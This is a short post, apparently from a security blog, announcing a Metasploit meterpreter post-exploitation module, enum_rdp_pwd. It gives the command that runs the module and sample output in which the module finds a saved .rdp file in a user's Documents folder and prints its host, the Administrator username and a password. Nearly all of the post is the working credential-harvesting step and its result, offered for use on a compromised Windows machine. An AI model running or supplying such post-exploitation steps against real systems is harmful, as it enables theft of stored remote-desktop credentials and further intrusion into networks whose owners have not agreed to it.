Metasploit .RDP password module
Just finished a new module for metasploit meterpreter post-exploitation
Once you gain a meterpreter session just run
run post/windows/gather/enum_rdp_pwd
meterpreter > run post/windows/gather/enum_rdp_pwd
[*] Searching for *.rdp files in C:\Users\Will\Documents
[*] Found: C:\Users\Will\Documents\Default.rdp
[*] Host: 10.1.10.8
[*] User: Administrator
[*] Pass: metasploit